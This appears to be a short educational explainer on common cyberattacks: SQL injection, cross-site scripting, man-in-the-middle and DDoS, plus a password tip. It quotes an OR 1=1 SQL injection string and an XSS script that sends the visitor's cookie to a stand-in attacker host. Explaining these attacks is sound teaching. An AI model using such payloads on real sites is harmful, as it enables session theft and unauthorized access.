Cybersecurity is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information.
Complexity is your best defense. Use at least 12 characters, including numbers and symbols.
Attackers insert malicious SQL code into input fields. If the database executes it, they can bypass security.
SELECT * FROM users WHERE user='admin' AND pass='' OR 1=1 --'
The -- tells the database to ignore the rest of the query!
An attacker injects malicious scripts into content from otherwise trusted websites. When you visit the site, the script runs in your browser.
<script>document.location='http://attacker.com/steal_cookie.cgi?c='+document.cookie</script>
This code could steal the user's session cookie, allowing the attacker to impersonate them.
An attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other.
Example: Connecting to a fake public Wi-Fi network that looks legitimate. The network's owner can then intercept your web traffic.
A DDoS attack floods a server with overwhelming traffic, making the service unavailable to legitimate users.
Example: Thousands of compromised computers (a botnet) all try to access a single website at the same time, causing it to crash.